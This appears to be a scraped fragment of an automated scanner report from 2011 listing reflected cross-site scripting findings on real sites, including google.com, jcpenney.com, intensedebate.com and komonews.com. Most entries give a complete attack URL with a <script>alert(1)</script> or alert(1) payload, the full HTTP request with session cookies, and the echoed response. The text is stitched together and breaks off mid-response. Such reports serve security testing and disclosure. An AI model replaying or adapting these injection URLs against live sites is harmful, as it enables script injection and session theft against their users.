HTTP/1.1 404 Not Found Date: Wed, 23 Feb 2011 23:08:57 GMT Server: Apache/1.3.42 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Set-Cookie: PHPSESSID=b12b1ebc7d2fec9ac1c120a931ce8ab5; path=/ Connection: close Content-Type: text/html Content-Length: 5460
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>Page No ...[SNIP]... <a href="/bus36e73"><a>9552f5671b8/"> ...[SNIP]...
1.395. http://www.google.com/advanced_search [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.google.com
Path:
/advanced_search
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 3098c(a)9e795bf8852 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /advanced_search?3098c(a)9e795bf8852=1 HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: enabled=0; PREF=ID=b1572e52fc3cd4d5:U=bce7df5b3282f251:FF=4:LD=en:CR=2:TM=1297804539:LM=1298681654:GM=1:SG=1:S=-JanrRLI9rSxMcr6; NID=44=mcJxkrzXmczElElnaF5HocjNHmLNt4pvYRyvxjBgt1PNqwmpYxKB6kYZjqhCdWRZPIUGMXU6-O1SB_eTxLxXwWP03fWJ6TZXOH275z7fcKKbXQwKJPRVr195riQJN7Vo;
The value of the tch request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload d9639(a)a632ca10bea was submitted in the tch parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search?sclient=psy&hl=en&safe=off&source=hp&q=240+813-1866&aq=f&aqi=&aql=&oq=&pbx=1&bav=on.1,or.&fp=19d8439716407a1a&tch=1d9639(a)a632ca10bea&ech=1&psi=169mTe-rNcOblgf54ciDAg12985753385413 HTTP/1.1 Host: www.google.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=240+813+1866 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Avail-Dictionary: rU20-FBA Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: enabled=0; NID=44=pQ4eIjwCSm2WOoKbUXgYa4QUKflgqM23t_08vBWQgmL1yZwd-wLuzaKiui-FEVH4ZpBbB-kw1Gq_VLRJJ-qV-627aFk3mtmwP3kZiFcS9khxAw3WiUaQbqrikQfGpyhG; PREF=ID=b1572e52fc3cd4d5:U=bce7df5b3282f251:FF=4:LD=en:CR=2:TM=1297804539:LM=1298575319:GM=1:SG=1:S=yzQzg9fu_LrIwvaf
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 184c3'><script>alert(1)</script>c5b963d468a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /js/getCommentLink.php184c3'><script>alert(1)</script>c5b963d468a HTTP/1.1 Host: www.intensedebate.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Date: Wed, 23 Feb 2011 22:12:09 GMT Content-Type: text/html; charset=utf-8 Connection: close Vary: Accept-Encoding P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Length: 4807
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conte ...[SNIP]... <script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/js/getCommentLink.php184c3'><script>alert(1)</script>c5b963d468a'> ...[SNIP]...
1.398. http://www.intensedebate.com/js/getCommentLink.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.intensedebate.com
Path:
/js/getCommentLink.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fbf47'><script>alert(1)</script>ae51ac4036 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /js/getCommentLink.php/fbf47'><script>alert(1)</script>ae51ac4036 HTTP/1.1 Host: www.intensedebate.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Date: Wed, 23 Feb 2011 22:12:06 GMT Content-Type: text/html; charset=utf-8 Connection: close Vary: Accept-Encoding P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Length: 4805
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Conte ...[SNIP]... <script type='text/javascript' src='http://wordpress.com/remote-login.php?action=js&id=120742&host=intensedebate.com&back=http://intensedebate.com/js/getCommentLink.php/fbf47'><script>alert(1)</script>ae51ac4036'> ...[SNIP]...
The value of the postid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload a45a9(a)8026e7e6978 was submitted in the postid parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /js/getCommentLink.php?acct=742530b2bd340020fe6aa362ef3f908c&postid=a45a9(a)8026e7e6978&posturl=http://www.komonews.com/news/local/116755469.html HTTP/1.1 Host: www.intensedebate.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx Date: Wed, 23 Feb 2011 22:12:16 GMT Content-Type: text/html; charset=utf-8 Connection: close Vary: Accept-Encoding P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Length: 3641
var IDHost = "http://www.intensedebate.com/"; var scripts = document.getElementsByTagName("script"); var parentObja45a9(a)8026e7e6978 = null; var theObja45a9(a)8026e7e6978 = null; var acct = '742530b2bd340020fe6aa362ef3f908c'; var thisdate = new Date();
function checkIna45a9(a)8026e7e6978() { if(!newImage) { var newImage = docu ...[SNIP]...
The value of the function request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 4f9b5%3balert(1)//8a09436e575 was submitted in the function parameter. This input was echoed as 4f9b5;alert(1)//8a09436e575 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jcp/getjcpheaderc.aspx?function=getmenuitems4f9b5%3balert(1)//8a09436e575&ver=20110225&fx=3 HTTP/1.1 Host: www.jcpenney.com Proxy-Connection: keep-alive Referer: http://www.jcpenney.com/jcp/default.aspx Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: stop_mobi=yes; AKJCP=CT-1
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 P3P: CP="CAO DSP COR CURa DEVa PSAa IVAa OURa IND UNI NAV STA OTC" Cache-Control: private Expires: Sat, 26 Feb 2011 16:53:06 GMT Content-Type: text/html; charset=utf-8 ntCoent-Length: 56 Date: Sat, 26 Feb 2011 04:53:06 GMT Connection: close Vary: Accept-Encoding Content-Length: 56
Error function : getmenuitems4f9b5;alert(1)//8a09436e575
1.401. http://www.komonews.com/home/video/116474128.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/home/video/116474128.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60e08"><script>alert(1)</script>034151ed390 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /home/video/116474128.html?60e08"><script>alert(1)</script>034151ed390=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: dv-c1-r2-u24-b14 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:15:30 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 52612
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
Pizza work ...[SNIP]... <a name="fb_share" type="box_count" share_url="http://www.komonews.com/home/video/116474128.html?60e08"><script>alert(1)</script>034151ed390=1" href="http://www.facebook.com/sharer.php"> ...[SNIP]...
1.402. http://www.komonews.com/home/video/116545678.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/home/video/116545678.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e617"><script>alert(1)</script>b9f69a85e49 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /home/video/116545678.html?8e617"><script>alert(1)</script>b9f69a85e49=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: dv-c1-r2-u24-b14 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:15:26 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 52532
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
Popsicle b ...[SNIP]... <a name="fb_share" type="box_count" share_url="http://www.komonews.com/home/video/116545678.html?8e617"><script>alert(1)</script>b9f69a85e49=1" href="http://www.facebook.com/sharer.php"> ...[SNIP]...
1.403. http://www.komonews.com/home/video/116673784.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/home/video/116673784.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de53e"><script>alert(1)</script>dab5cd8a77e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /home/video/116673784.html?de53e"><script>alert(1)</script>dab5cd8a77e=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: dv-c1-r2-u24-b7 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:15:27 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 52551
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
Dog food d ...[SNIP]... <a name="fb_share" type="box_count" share_url="http://www.komonews.com/home/video/116673784.html?de53e"><script>alert(1)</script>dab5cd8a77e=1" href="http://www.facebook.com/sharer.php"> ...[SNIP]...
1.404. http://www.komonews.com/home/video/116675584.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/home/video/116675584.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de34b"><script>alert(1)</script>27421b48bf6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /home/video/116675584.html?de34b"><script>alert(1)</script>27421b48bf6=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: dv-c1-r2-u24-b14 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:15:26 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 52557
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
All aboard ...[SNIP]... <a name="fb_share" type="box_count" share_url="http://www.komonews.com/home/video/116675584.html?de34b"><script>alert(1)</script>27421b48bf6=1" href="http://www.facebook.com/sharer.php"> ...[SNIP]...
1.405. http://www.komonews.com/home/video/116675749.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/home/video/116675749.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28363"><script>alert(1)</script>99e6cbbb627 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /home/video/116675749.html?28363"><script>alert(1)</script>99e6cbbb627=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: dv-c1-r2-u24-b14 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:15:27 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 52472
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
Cameras ca ...[SNIP]... <a name="fb_share" type="box_count" share_url="http://www.komonews.com/home/video/116675749.html?28363"><script>alert(1)</script>99e6cbbb627=1" href="http://www.facebook.com/sharer.php"> ...[SNIP]...
1.406. http://www.komonews.com/home/video/116702184.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/home/video/116702184.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0c0c"><script>alert(1)</script>f487fe8b3fa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /home/video/116702184.html?d0c0c"><script>alert(1)</script>f487fe8b3fa=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: dv-c1-r2-u7-b6 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:15:24 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 52498
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
1.407. http://www.komonews.com/news/116650859.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/news/116650859.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 396b3"><script>alert(1)</script>40d72bcd3cc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/116650859.html?396b3"><script>alert(1)</script>40d72bcd3cc=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: dv-c1-r2-u24-b14 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:14:02 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 59787
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
Seattle co ...[SNIP]... <a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/116650859.html?396b3"><script>alert(1)</script>40d72bcd3cc=1" href="http://www.facebook.com/sharer.php"> ...[SNIP]...
The value of the skipthumb request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38c42"><script>alert(1)</script>c1b448bc43d was submitted in the skipthumb parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/116650859.html?skipthumb=Y38c42"><script>alert(1)</script>c1b448bc43d HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: dv-c1-r2-u7-b6 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:13:51 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 59795
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
Seattle co ...[SNIP]... <a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/116650859.html?skipthumb=Y38c42"><script>alert(1)</script>c1b448bc43d" href="http://www.facebook.com/sharer.php"> ...[SNIP]...
1.409. http://www.komonews.com/news/116652534.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/news/116652534.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d385"><script>alert(1)</script>c66634aa9ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/116652534.html?7d385"><script>alert(1)</script>c66634aa9ad=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: dv-c1-r2-u24-b14 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:13:57 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 62451
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
An appetiz ...[SNIP]... <a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/116652534.html?7d385"><script>alert(1)</script>c66634aa9ad=1" href="http://www.facebook.com/sharer.php"> ...[SNIP]...
1.410. http://www.komonews.com/news/116694569.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.komonews.com
Path:
/news/116694569.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59b98"><script>alert(1)</script>98d22e6ce5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /news/116694569.html?59b98"><script>alert(1)</script>98d22e6ce5=1 HTTP/1.1 Host: www.komonews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;
Response
HTTP/1.1 200 OK Server: Apache X-Server-Name: dv-c1-r2-u24-b7 Content-Type: text/html;charset=utf-8 Date: Wed, 23 Feb 2011 22:13:57 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: click_mobile=0 Content-Length: 62501
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns:fb="http://facebook.com/2008/fbml"> <head> <title>
